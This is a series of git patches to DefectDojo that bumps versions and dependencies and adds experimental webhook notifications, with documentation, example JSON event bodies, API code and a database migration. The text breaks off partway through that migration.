From a48829a4eed456e4ad99a9c8d3669a0a976ae3ed Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 9 Sep 2024 16:09:26 +0000 Subject: [PATCH 01/62] Update versions in application files --- components/package.json | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/components/package.json b/components/package.json index 8b293de9533..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.1", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 42163033648..61744bdfbd6 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.1" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.149 +version: 1.6.150-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 4c5a4cf9406fee8327fce5defb9649540fbddfb3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 10 Sep 2024 13:37:49 -0500 Subject: [PATCH 02/62] Bump boto3 from 1.35.14 to 1.35.15 (#10888) Bumps [boto3](https://github.com/boto/boto3) from 1.35.14 to 1.35.15. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.14...1.35.15) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5a1e3d0ca6d..e21c7a0eaf0 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.14 # Required for Celery Broker AWS (SQS) support +boto3==1.35.15 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 0ae340c4b974073cacdcce96ba334f567f8adc09 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 11 Sep 2024 22:34:08 -0500 Subject: [PATCH 03/62] Bump boto3 from 1.35.15 to 1.35.16 (#10895) Bumps [boto3](https://github.com/boto/boto3) from 1.35.15 to 1.35.16. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.15...1.35.16) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... 
Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e21c7a0eaf0..e96a0833561 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.15 # Required for Celery Broker AWS (SQS) support +boto3==1.35.16 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From ea4e733b24339aecbed4ee90becb4388c61ca3a0 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 11 Sep 2024 22:35:12 -0500 Subject: [PATCH 04/62] Bump pytz from 2024.1 to 2024.2 (#10896) Bumps [pytz](https://github.com/stub42/pytz) from 2024.1 to 2024.2. - [Release notes](https://github.com/stub42/pytz/releases) - [Commits](https://github.com/stub42/pytz/compare/release_2024.1...release_2024.2) --- updated-dependencies: - dependency-name: pytz dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e96a0833561..a6f7cd79296 100644 --- a/requirements.txt +++ b/requirements.txt @@ -34,7 +34,7 @@ Pillow==10.4.0 # required by django-imagekit psycopg[c]==3.2.1 cryptography==43.0.1 python-dateutil==2.9.0.post0 -pytz==2024.1 +pytz==2024.2 redis==5.0.8 requests==2.32.3 sqlalchemy==2.0.34 # Required by Celery broker transport From e004cb43c72462cdbc1071b371b429d706b35028 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 13 Sep 2024 16:56:36 -0500 Subject: [PATCH 05/62] Bump boto3 from 1.35.16 to 1.35.18 (#10904) Bumps [boto3](https://github.com/boto/boto3) from 1.35.16 to 1.35.18. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.16...1.35.18) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a6f7cd79296..a6ac748122c 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.16 # Required for Celery Broker AWS (SQS) support +boto3==1.35.18 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From d87a3c35dda68b1d55d225e0b727eba8409930a3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 13 Sep 2024 16:57:01 -0500 Subject: [PATCH 06/62] Bump asteval from 1.0.2 to 1.0.3 (#10903) Bumps [asteval](https://github.com/lmfit/asteval) from 1.0.2 to 1.0.3. 
- [Release notes](https://github.com/lmfit/asteval/releases) - [Commits](https://github.com/lmfit/asteval/compare/1.0.2...1.0.3) --- updated-dependencies: - dependency-name: asteval dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a6ac748122c..7941ba1544e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ # requirements.txt for DefectDojo using Python 3.x -asteval==1.0.2 +asteval==1.0.3 bleach==6.1.0 bleach[css] celery==5.4.0 From 330462d1025f55aa7be5d42539c88851238c05c9 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Sat, 14 Sep 2024 02:00:28 +0200 Subject: [PATCH 07/62] Notifications: Add support for webhooks (#7311) * Add go-httpbin * First round of changes * move webhooks to separated model,fix err handliing * flake8 * Uset contant instead of strings * Add basic API endpoints * Add owner of endpoint * Update go-httpbin * Basic GUI * per line * upgrade go-httpbin, move db_mig * Disable view and changes if not enabled in setting * Fix full text of status * Update go-httpbin * Move migration * Rename model + flake8 * Rebase db mig * Rearange setting buttons, add connectivity validator * Handle more generic errors from 'requests' * flake8 * Rewrite YAML template to JSON request body * update go-httpbin * Update go-httpbin * Inc db_mig * Upgrade * Ruff * Update httpbin, move db_mig, use as_view * Fix nones, more verbose "missing template" * Prepare templates * Usable by admins only * API tests * Add main unittests * Update 4xx test * Docs: add Transition graph * ruff * Rewrite * Start "webhook.endpoint" in unit-tests * Extend webhook_status_cleanup, add note to related places * More tests * Small adjustments * Set max_length * Better handle nones * Add basic doc + fix findings_list * Update docs * Clean ruff * Fix db_mig * Fix long notes * Clean ruff * Move "webhook.endpoint" from debug docker to dev * Make fields "editable=False" * Try to fix accesslint * Use class-based choices * Shorter default timeout * Update dojo/notifications/views.py Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> * Finish preprocess_request * Update dojo/notifications/helper.py Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> * Show error-times as hint * Try to fix accesslint * Rename `url` to `url_ui` and add `url_api` * inc db_mig * Accept any 2xx as successful * Add permission checker for item in menu * Fix editing for superadmin --------- Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> --- .github/workflows/rest-framework-tests.yml | 4 +- docker-compose.override.dev.yml | 2 + docker-compose.override.unit_tests.yml | 2 + docker-compose.override.unit_tests_cicd.yml | 2 + docs/content/en/integrations/burp-plugin.md | 2 +- docs/content/en/integrations/exporting.md | 2 +- .../en/integrations/google-sheets-sync.md | 2 +- docs/content/en/integrations/languages.md | 2 +- .../notification_webhooks/_index.md | 79 +++ .../notification_webhooks/engagement_added.md | 38 ++ .../notification_webhooks/product_added.md | 32 ++ .../product_type_added.md | 26 + .../notification_webhooks/scan_added.md | 90 ++++ .../notification_webhooks/test_added.md | 44 ++ docs/content/en/integrations/notifications.md | 7 +- 
docs/content/en/integrations/rate_limiting.md | 2 +- dojo/api_v2/serializers.py | 7 + dojo/api_v2/views.py | 11 + .../0215_webhooks_notifications.py | 130 +++++ dojo/engagement/signals.py | 2 +- dojo/fixtures/dojo_testdata.json | 57 ++- dojo/forms.py | 27 + dojo/models.py | 38 ++ dojo/notifications/helper.py | 180 ++++++- dojo/notifications/urls.py | 4 + dojo/notifications/views.py | 305 ++++++++++- dojo/product/signals.py | 4 +- dojo/product_type/signals.py | 4 +- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 5 +- dojo/templates/base.html | 7 + .../dojo/add_notification_webhook.html | 13 + .../dojo/delete_notification_webhook.html | 12 + .../dojo/edit_notification_webhook.html | 15 + dojo/templates/dojo/notifications.html | 3 + dojo/templates/dojo/system_settings.html | 2 +- .../dojo/view_notification_webhooks.html | 101 ++++ dojo/templates/dojo/view_product_details.html | 2 +- .../webhooks/engagement_added.tpl | 2 + .../notifications/webhooks/other.tpl | 1 + .../notifications/webhooks/product_added.tpl | 2 + .../webhooks/product_type_added.tpl | 2 + .../notifications/webhooks/scan_added.tpl | 12 + .../webhooks/scan_added_empty.tpl | 1 + .../webhooks/subtemplates/base.tpl | 13 + .../webhooks/subtemplates/engagement.tpl | 13 + .../webhooks/subtemplates/findings_list.tpl | 12 + .../webhooks/subtemplates/product.tpl | 13 + .../webhooks/subtemplates/product_type.tpl | 8 + .../webhooks/subtemplates/test.tpl | 13 + .../notifications/webhooks/test_added.tpl | 2 + dojo/templatetags/display_tags.py | 5 + dojo/urls.py | 2 + requirements.txt | 1 + tests/notifications_test.py | 5 + unittests/test_notifications.py | 483 +++++++++++++++++- unittests/test_rest_framework.py | 23 + 57 files changed, 1848 insertions(+), 32 deletions(-) create mode 100644 docs/content/en/integrations/notification_webhooks/_index.md create mode 100644 docs/content/en/integrations/notification_webhooks/engagement_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/product_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/product_type_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/scan_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/test_added.md create mode 100644 dojo/db_migrations/0215_webhooks_notifications.py create mode 100644 dojo/templates/dojo/add_notification_webhook.html create mode 100644 dojo/templates/dojo/delete_notification_webhook.html create mode 100644 dojo/templates/dojo/edit_notification_webhook.html create mode 100644 dojo/templates/dojo/view_notification_webhooks.html create mode 100644 dojo/templates/notifications/webhooks/engagement_added.tpl create mode 100644 dojo/templates/notifications/webhooks/other.tpl create mode 100644 dojo/templates/notifications/webhooks/product_added.tpl create mode 100644 dojo/templates/notifications/webhooks/product_type_added.tpl create mode 100644 dojo/templates/notifications/webhooks/scan_added.tpl create mode 120000 dojo/templates/notifications/webhooks/scan_added_empty.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/base.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/engagement.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/findings_list.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/product.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/product_type.tpl create mode 100644 
dojo/templates/notifications/webhooks/subtemplates/test.tpl create mode 100644 dojo/templates/notifications/webhooks/test_added.tpl diff --git a/.github/workflows/rest-framework-tests.yml b/.github/workflows/rest-framework-tests.yml index 907ecf92968..f153a368ba9 100644 --- a/.github/workflows/rest-framework-tests.yml +++ b/.github/workflows/rest-framework-tests.yml @@ -34,8 +34,8 @@ jobs: run: docker/setEnv.sh unit_tests_cicd # phased startup so we can use the exit code from unit test container - - name: Start Postgres - run: docker compose up -d postgres + - name: Start Postgres and webhook.endpoint + run: docker compose up -d postgres webhook.endpoint # no celery or initializer needed for unit tests - name: Unit tests diff --git a/docker-compose.override.dev.yml b/docker-compose.override.dev.yml index f3a281af061..cf60d8d00a3 100644 --- a/docker-compose.override.dev.yml +++ b/docker-compose.override.dev.yml @@ -53,3 +53,5 @@ services: published: 8025 protocol: tcp mode: host + "webhook.endpoint": + image: mccutchen/go-httpbin:v2.14.0@sha256:e0f398a0a29e7cf00a2467326344d70b4d89d0786d8f9a3287c2a0371c804823 diff --git a/docker-compose.override.unit_tests.yml b/docker-compose.override.unit_tests.yml index 164d7a87084..ccf3c84030a 100644 --- a/docker-compose.override.unit_tests.yml +++ b/docker-compose.override.unit_tests.yml @@ -51,6 +51,8 @@ services: redis: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] + "webhook.endpoint": + image: mccutchen/go-httpbin:v2.14.0@sha256:e0f398a0a29e7cf00a2467326344d70b4d89d0786d8f9a3287c2a0371c804823 volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} diff --git a/docker-compose.override.unit_tests_cicd.yml b/docker-compose.override.unit_tests_cicd.yml index b39f4cf034d..141ad7227dc 100644 --- a/docker-compose.override.unit_tests_cicd.yml +++ b/docker-compose.override.unit_tests_cicd.yml @@ -50,6 +50,8 @@ services: redis: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] + "webhook.endpoint": + image: mccutchen/go-httpbin:v2.14.0@sha256:e0f398a0a29e7cf00a2467326344d70b4d89d0786d8f9a3287c2a0371c804823 volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} diff --git a/docs/content/en/integrations/burp-plugin.md b/docs/content/en/integrations/burp-plugin.md index 400b37c0f2a..ab3285ceda4 100644 --- a/docs/content/en/integrations/burp-plugin.md +++ b/docs/content/en/integrations/burp-plugin.md @@ -2,7 +2,7 @@ title: "Defect Dojo Burp plugin" description: "Export findings directly from Burp to DefectDojo." draft: false -weight: 8 +weight: 9 --- **Please note: The DefectDojo Burp Plugin has been sunset and is no longer a supported feature.** diff --git a/docs/content/en/integrations/exporting.md b/docs/content/en/integrations/exporting.md index da17df7d93b..7a42d27b17e 100644 --- a/docs/content/en/integrations/exporting.md +++ b/docs/content/en/integrations/exporting.md @@ -2,7 +2,7 @@ title: "Exporting" description: "DefectDojo has the ability to export findings." draft: false -weight: 11 +weight: 12 --- diff --git a/docs/content/en/integrations/google-sheets-sync.md b/docs/content/en/integrations/google-sheets-sync.md index b6e97f72f84..456a694fc6e 100644 --- a/docs/content/en/integrations/google-sheets-sync.md +++ b/docs/content/en/integrations/google-sheets-sync.md @@ -2,7 +2,7 @@ title: "Google Sheets synchronisation" description: "Export finding details to Google Sheets and upload changes from Google Sheets." 
 draft: false
-weight: 7
+weight: 8
 ---
 
 **Please note - the Google Sheets feature has been deprecated as of DefectDojo version 2.21.0 - these documents are for reference only.**
diff --git a/docs/content/en/integrations/languages.md b/docs/content/en/integrations/languages.md
index 17a322c8f90..a78ed137e69 100644
--- a/docs/content/en/integrations/languages.md
+++ b/docs/content/en/integrations/languages.md
@@ -2,7 +2,7 @@
 title: "Languages and lines of code"
 description: "You can import an analysis of languages used in a project, including lines of code."
 draft: false
-weight: 9
+weight: 10
 ---
 
 ## Import of languages for a project
diff --git a/docs/content/en/integrations/notification_webhooks/_index.md b/docs/content/en/integrations/notification_webhooks/_index.md
new file mode 100644
index 00000000000..d8fe606cffa
--- /dev/null
+++ b/docs/content/en/integrations/notification_webhooks/_index.md
@@ -0,0 +1,79 @@
+---
+title: "Notification Webhooks (experimental)"
+description: "How to set up and use webhooks"
+weight: 7
+chapter: true
+---
+
+Webhooks are HTTP requests sent from the DefectDojo instance to a user-defined web server that expects this kind of incoming traffic.
+
+## Transition graph:
+
+It is not unusual for a webhook delivery to fail. Failures are usually caused by network issues, server misconfiguration, or upgrades running on the receiving server. DefectDojo needs to react to these outages, so it may temporarily or permanently disable the related endpoint. The following graph shows how the status of a webhook definition may change based on HTTP responses (or manual user interaction).
+
+```mermaid
+flowchart TD
+
+    START{{Endpoint created}}
+    ALL{All states}
+    STATUS_ACTIVE([STATUS_ACTIVE])
+    STATUS_INACTIVE_TMP
+    STATUS_INACTIVE_PERMANENT
+    STATUS_ACTIVE_TMP([STATUS_ACTIVE_TMP])
+    END{{Endpoint removed}}
+
+    START ==> STATUS_ACTIVE
+    STATUS_ACTIVE --HTTP 200 or 201 --> STATUS_ACTIVE
+    STATUS_ACTIVE --HTTP 5xx<br/>or HTTP 429<br/>or Timeout--> STATUS_INACTIVE_TMP
+    STATUS_ACTIVE --Any HTTP 4xx response<br/>or any other HTTP response<br/>or non-HTTP error--> STATUS_INACTIVE_PERMANENT
+    STATUS_INACTIVE_TMP -.After 60s.-> STATUS_ACTIVE_TMP
+    STATUS_ACTIVE_TMP --HTTP 5xx<br/>or HTTP 429<br/>or Timeout<br/>within 24h<br/>from the first error-->STATUS_INACTIVE_TMP
+    STATUS_ACTIVE_TMP -.After 24h.-> STATUS_ACTIVE
+    STATUS_ACTIVE_TMP --HTTP 200 or 201 --> STATUS_ACTIVE_TMP
+    STATUS_ACTIVE_TMP --HTTP 5xx<br/>or HTTP 429<br/>or Timeout<br/>within 24h from the first error<br/>or any other HTTP response or error--> STATUS_INACTIVE_PERMANENT
+    ALL ==Activation by user==> STATUS_ACTIVE
+    ALL ==Deactivation by user==> STATUS_INACTIVE_PERMANENT
+    ALL ==Removal of endpoint by user==> END
+```
+
+Notes:
+
+1. Transitions:
+    - bold: manual changes by the user
+    - dotted: automated by celery
+    - others: based on responses to webhooks
+1. Nodes:
+    - Stadium-shaped: Active - subsequent webhooks can be sent
+    - Rectangles: Inactive - webhook delivery will fail (and will not be retried)
+    - Hexagonal: Initial and final states
+    - Rhombus: All states (meta node to make the graph more readable)
+
+## Body and Headers
+
+The body of each request is JSON containing data about the related event, such as the names and IDs of the affected elements.
+Examples of bodies are on the pages related to each event (see below).
+
+Each request contains the following headers. They might be useful for better handling of events by the server that processes them.
+
+```yaml
+User-Agent: DefectDojo-<version>
+X-DefectDojo-Event: <event>
+X-DefectDojo-Instance: <URL of the DefectDojo instance>
+```
+
+## Disclaimer
+
+This functionality is new and experimental. This means it might introduce breaking changes in following DefectDojo releases and should not be considered final.
+
+However, the community is open to feedback to make this functionality better and stabilize it as soon as possible.
+
+## Roadmap
+
+There are a couple of known limitations that are expected to be addressed once the core functionality is considered ready:
+
+- Supported events - not only the addition of products, product types, engagements, tests, or the upload of new scans, but also events around SLAs
+- User webhooks - right now only admins can define webhooks; in the future, users will also be able to define their own
+- UI improvements - add filtering and pagination of webhook endpoints
+
+## Events
+
\ No newline at end of file
diff --git a/docs/content/en/integrations/notification_webhooks/engagement_added.md b/docs/content/en/integrations/notification_webhooks/engagement_added.md
new file mode 100644
index 00000000000..64fd7746ec2
--- /dev/null
+++ b/docs/content/en/integrations/notification_webhooks/engagement_added.md
@@ -0,0 +1,38 @@
+---
+title: "Event: engagement_added"
+weight: 3
+chapter: true
+---
+
+## Event HTTP header
+```yaml
+X-DefectDojo-Event: engagement_added
+```
+
+## Event HTTP body
+```json
+{
+    "description": null,
+    "engagement": {
+        "id": 7,
+        "name": "notif eng",
+        "url_api": "http://localhost:8080/api/v2/engagements/7/",
+        "url_ui": "http://localhost:8080/engagement/7"
+    },
+    "product": {
+        "id": 4,
+        "name": "notif prod",
+        "url_api": "http://localhost:8080/api/v2/products/4/",
+        "url_ui": "http://localhost:8080/product/4"
+    },
+    "product_type": {
+        "id": 4,
+        "name": "notif prod type",
+        "url_api": "http://localhost:8080/api/v2/product_types/4/",
+        "url_ui": "http://localhost:8080/product/type/4"
+    },
+    "url_api": "http://localhost:8080/api/v2/engagements/7/",
+    "url_ui": "http://localhost:8080/engagement/7",
+    "user": null
+}
+```
\ No newline at end of file
diff --git a/docs/content/en/integrations/notification_webhooks/product_added.md b/docs/content/en/integrations/notification_webhooks/product_added.md
new file mode 100644
index 00000000000..2d90a6a681f
--- /dev/null
+++ b/docs/content/en/integrations/notification_webhooks/product_added.md
@@ -0,0 +1,32 @@
+---
+title: "Event: product_added"
+weight: 2
+chapter: true
+---
+
+## Event HTTP header
+```yaml
+X-DefectDojo-Event: product_added
+```
+
+## Event HTTP body
+```json
+{
+    "description": null,
+    "product": {
+        "id": 4,
+        "name": "notif prod",
+        "url_api": "http://localhost:8080/api/v2/products/4/",
+        "url_ui": "http://localhost:8080/product/4"
+    },
+    "product_type": {
+        "id": 4,
+        "name": "notif prod type",
+        "url_api": "http://localhost:8080/api/v2/product_types/4/",
+        "url_ui": "http://localhost:8080/product/type/4"
+    },
+    "url_api": "http://localhost:8080/api/v2/products/4/",
+    "url_ui": "http://localhost:8080/product/4",
+    "user": null
+}
+```
\ No newline at end of file
diff --git a/docs/content/en/integrations/notification_webhooks/product_type_added.md b/docs/content/en/integrations/notification_webhooks/product_type_added.md
new file mode 100644
index 00000000000..1171f513831
--- /dev/null
+++ b/docs/content/en/integrations/notification_webhooks/product_type_added.md
@@ -0,0 +1,26 @@
+---
+title: "Event: product_type_added"
+weight: 1
+chapter: true
+---
+
+## Event HTTP header
+```yaml
+X-DefectDojo-Event: product_type_added
+```
+
+## Event HTTP body
+```json
+{
+    "description": null,
+    "product_type": {
+        "id": 4,
+        "name": "notif prod type",
+        "url_api": "http://localhost:8080/api/v2/product_types/4/",
+        "url_ui": "http://localhost:8080/product/type/4"
+    },
+    "url_api": "http://localhost:8080/api/v2/product_types/4/",
+    "url_ui": "http://localhost:8080/product/type/4",
+    "user": null
+}
+```
\ No newline at end of file
diff --git a/docs/content/en/integrations/notification_webhooks/scan_added.md b/docs/content/en/integrations/notification_webhooks/scan_added.md
new file mode 100644
index 00000000000..27a40e6cab1
--- /dev/null
+++ b/docs/content/en/integrations/notification_webhooks/scan_added.md
@@ -0,0 +1,90 @@
+---
+title: "Event: scan_added and scan_added_empty"
+weight: 5
+chapter: true
+---
+
+ +## Event HTTP header for scan_added +```yaml +X-DefectDojo-Event: scan_added +``` + +## Event HTTP header for scan_added_empty +```yaml +X-DefectDojo-Event: scan_added_empty +``` + +## Event HTTP body +```json +{ + "description": null, + "engagement": { + "id": 7, + "name": "notif eng", + "url_api": "http://localhost:8080/api/v2/engagements/7/", + "url_ui": "http://localhost:8080/engagement/7" + }, + "finding_count": 4, + "findings": { + "mitigated": [ + { + "id": 233, + "severity": "Medium", + "title": "Mitigated Finding", + "url_api": "http://localhost:8080/api/v2/findings/233/", + "url_ui": "http://localhost:8080/finding/233" + } + ], + "new": [ + { + "id": 232, + "severity": "Critical", + "title": "New Finding", + "url_api": "http://localhost:8080/api/v2/findings/232/", + "url_ui": "http://localhost:8080/finding/232" + } + ], + "reactivated": [ + { + "id": 234, + "severity": "Low", + "title": "Reactivated Finding", + "url_api": "http://localhost:8080/api/v2/findings/234/", + "url_ui": "http://localhost:8080/finding/234" + } + ], + "untouched": [ + { + "id": 235, + "severity": "Info", + "title": "Untouched Finding", + "url_api": "http://localhost:8080/api/v2/findings/235/", + "url_ui": "http://localhost:8080/finding/235" + } + ] + }, + "product": { + "id": 4, + "name": "notif prod", + "url_api": "http://localhost:8080/api/v2/products/4/", + "url_ui": "http://localhost:8080/product/4" + }, + "product_type": { + "id": 4, + "name": "notif prod type", + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4" + }, + "test": { + "id": 90, + "title": "notif test", + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90" + }, + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90", + "user": null +} +``` \ No newline at end of file diff --git a/docs/content/en/integrations/notification_webhooks/test_added.md b/docs/content/en/integrations/notification_webhooks/test_added.md new file mode 100644 index 00000000000..8614a80e0a6 --- /dev/null +++ b/docs/content/en/integrations/notification_webhooks/test_added.md @@ -0,0 +1,44 @@ +--- +title: "Event: test_added" +weight: 4 +chapter: true +--- + +## Event HTTP header +```yaml +X-DefectDojo-Event: test_added +``` + +## Event HTTP body +```json +{ + "description": null, + "engagement": { + "id": 7, + "name": "notif eng", + "url_api": "http://localhost:8080/api/v2/engagements/7/", + "url_ui": "http://localhost:8080/engagement/7" + }, + "product": { + "id": 4, + "name": "notif prod", + "url_api": "http://localhost:8080/api/v2/products/4/", + "url_ui": "http://localhost:8080/product/4" + }, + "product_type": { + "id": 4, + "name": "notif prod type", + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4" + }, + "test": { + "id": 90, + "title": "notif test", + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90" + }, + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90", + "user": null +} +``` \ No newline at end of file diff --git a/docs/content/en/integrations/notifications.md b/docs/content/en/integrations/notifications.md index d5af295f0eb..803388797cd 100644 --- a/docs/content/en/integrations/notifications.md +++ b/docs/content/en/integrations/notifications.md @@ -18,6 +18,7 @@ The following notification methods currently exist: - Email - Slack - Microsoft Teams + - 
Webhooks - Alerts within DefectDojo (default) You can set these notifications on a global scope (if you have @@ -124,4 +125,8 @@ However, there is a specific use-case when the user decides to disable notificat The scope of this setting is customizable (see environmental variable `DD_NOTIFICATIONS_SYSTEM_LEVEL_TRUMP`). -For more information about this behavior see the [related pull request #9699](https://github.com/DefectDojo/django-DefectDojo/pull/9699/) \ No newline at end of file +For more information about this behavior see the [related pull request #9699](https://github.com/DefectDojo/django-DefectDojo/pull/9699/) + +## Webhooks (experimental) + +DefectDojo also supports webhooks that follow the same events as other notifications (you can be notified in the same situations). Details about setup are described in [related page](../notification_webhooks/). diff --git a/docs/content/en/integrations/rate_limiting.md b/docs/content/en/integrations/rate_limiting.md index 0cac784c5f5..1ea76ace5b3 100644 --- a/docs/content/en/integrations/rate_limiting.md +++ b/docs/content/en/integrations/rate_limiting.md @@ -2,7 +2,7 @@ title: "Rate Limiting" description: "Configurable rate limiting on the login page to mitigate brute force attacks" draft: false -weight: 9 +weight: 11 --- diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index c9a87a8362d..dc8acb40285 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -77,6 +77,7 @@ Note_Type, NoteHistory, Notes, + Notification_Webhooks, Notifications, Product, Product_API_Scan_Configuration, @@ -3172,3 +3173,9 @@ def create(self, validated_data): raise serializers.ValidationError(msg) else: raise + + +class NotificationWebhooksSerializer(serializers.ModelSerializer): + class Meta: + model = Notification_Webhooks + fields = "__all__" diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py index 05d16521069..7ae9925479a 100644 --- a/dojo/api_v2/views.py +++ b/dojo/api_v2/views.py @@ -111,6 +111,7 @@ Network_Locations, Note_Type, Notes, + Notification_Webhooks, Notifications, Product, Product_API_Scan_Configuration, @@ -3332,3 +3333,13 @@ class AnnouncementViewSet( def get_queryset(self): return Announcement.objects.all().order_by("id") + + +class NotificationWebhooksViewSet( + PrefetchDojoModelViewSet, +): + serializer_class = serializers.NotificationWebhooksSerializer + queryset = Notification_Webhooks.objects.all() + filter_backends = (DjangoFilterBackend,) + filterset_fields = "__all__" + permission_classes = (permissions.IsSuperUser, DjangoModelPermissions) # TODO: add permission also for other users diff --git a/dojo/db_migrations/0215_webhooks_notifications.py b/dojo/db_migrations/0215_webhooks_notifications.py new file mode 100644 index 00000000000..cc65ce43f1b --- /dev/null +++ b/dojo/db_migrations/0215_webhooks_notifications.py @@ -0,0 +1,130 @@ +# Generated by Django 5.0.8 on 2024-08-16 17:07 + +import django.db.models.deletion +import multiselectfield.db.fields +from django.db import migrations, models + + +class Migration(migrations.Migration): + + dependencies = [ + ('dojo', '0214_test_type_dynamically_generated'), + ] + + operations = [ + migrations.AddField( + model_name='system_settings', + name='enable_webhooks_notifications', + field=models.BooleanField(default=False, verbose_name='Enable Webhook notifications'), + ), + migrations.AddField( + model_name='system_settings', + name='webhooks_notifications_timeout', + field=models.IntegerField(default=10, help_text='How many seconds will DefectDojo 
